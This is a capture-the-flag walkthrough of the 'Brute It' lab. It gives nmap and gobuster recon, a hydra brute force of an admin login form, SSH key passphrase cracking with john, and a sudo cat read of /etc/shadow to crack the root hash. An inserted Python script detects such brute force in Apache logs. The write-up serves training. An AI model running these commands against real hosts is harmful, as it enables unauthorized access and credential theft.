Brute It

Task 2: Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.254.237

We have 2 open ports.

Detailed nmap scan:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Run the default nmap scripts

  • (-p): Scan only ports 22 and 80

  • (-oN nmap): Save the output in normal format to a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.254.237

We have the version of SSH running: OpenSSH 7.6p1

The version of Apache running is 2.4.29

The Linux distribution running is Ubuntu.

Let's visit the website.

It's the default Apache2 page. Let's look for hidden directories on the web server using gobuster.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.254.237/

We found a directory called /admin.

Task 3: Getting a Shell

Let's visit the directory we found.

It's a login page. As this is an admin login page, the username is most probably admin; we can confirm this by looking at the page's source code.

Let's use hydra to brute force the password. Before that we need to know how the username and password are submitted. We can find this out with Burp Suite: let's attempt a login and capture the request with Burp.

The format is user=<username>&pass=<password>, which we will supply to hydra. We also see a PHPSESSID cookie, which we need to include in the hydra command. The other thing we need is the website's response to a failed login attempt. Let's forward the request and we can see this.

Now we have all the information we need, so let's run hydra to crack the password.

Hydra command breakdown:

  • -l admin: Specifies the username as admin

  • -P /usr/share/wordlists/rockyou.txt: Specifies the password list

  • 10.10.254.237: Target IP

  • http-post-form: The attack module; we use it because we are attacking an HTTP form

  • /admin/: The directory we are attacking, which holds the login form

  • user=^USER^&pass=^PASS^: The request body captured in Burp Suite, with the placeholders hydra substitutes on each attempt

  • Username or password invalid: The response text shown on a failed login

  • H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0: The session cookie from the captured request

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.254.237 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid:H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0"

After running this we find the password xavier. Let's log in.
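As an added example from the defender's side, not part of the original write-up: the following Python script shows how a form brute force like this one stands out in the web server's access log. It parses Apache combined-format lines and flags any client that POSTs to /admin/ ten or more times within a sixty-second window. The log lines, IP addresses, user agents and threshold are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" access log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)


def detect_post_bursts(log_text, path="/admin/", threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_count} for clients that POST to `path` at least `threshold` times
    within any `window`. A guessing tool submits the form far faster than a person can type."""
    stamps = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == path:
            stamps[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in stamps.items():
        times.sort()
        peak = start = 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def build_sample_log():
    """Constructed sample log (not real traffic): one client hammering the form, one normal client."""
    fmt = '{ip} - - [{ts}] "POST /admin/ HTTP/1.1" 200 482 "-" "{ua}"'
    base = datetime(2024, 3, 12, 10, 0, 0)
    lines = []
    for i in range(40):  # 40 submissions in 20 seconds from one source (sample values)
        ts = (base + timedelta(milliseconds=500 * i)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        lines.append(fmt.format(ip="10.10.14.5", ts=ts, ua="Mozilla/5.0 (Hydra)"))
    for i in range(3):  # 3 submissions spread over 10 minutes from another source
        ts = (base + timedelta(minutes=5 * i)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        lines.append(fmt.format(ip="192.168.1.20", ts=ts, ua="Mozilla/5.0"))
    return "\n".join(lines)


if __name__ == "__main__":
    print(detect_post_bursts(build_sample_log()))  # {'10.10.14.5': 40}
```

Against a real server, feed the script the contents of the Apache access log and tune the threshold to the form's normal traffic; fail2ban-style rate limiting on the same pattern stops the guessing before the wordlist is exhausted.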

We found the first flag, and we also have an RSA private key. Let's copy it to our machine, name the file id_rsa, extract a crackable hash with ssh2john and then crack the passphrase with john.

Let's now use ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Now let's crack this hash using john.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash

And we have the passphrase, so let's log in over SSH. This is probably the key of the user john, as that was the only other username we found. Before that we need to restrict the permissions of the id_rsa file, since ssh refuses to use a private key that other users can read.

chmod 600 id_rsa

Now let's log in.

ssh -i id_rsa john@10.10.254.237

We are logged in. We can read the user.txt file.

We can now answer all the questions in this section.

Task 4: Privilege Escalation

Let's run sudo -l to see what we can run as root.

sudo -l

It looks like we can run /bin/cat as root. Looking on GTFOBins, we can see that we can point a variable at a file and read that file with sudo.

The /etc/shadow file stores the password hashes of all users on the machine, so we can read the root hash and then crack it using John the Ripper. Let's first set the LFILE variable to /etc/shadow and then read it.

LFILE=/etc/shadow
sudo cat "$LFILE"

We have the root hash. Let's copy it to our machine, store it in a file called hash and then crack it using john.

Now let's crack it and then show the result.

john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash

We have the password for root. Let's switch users.

su root

We can now read the root flag and also answer all the questions in this section.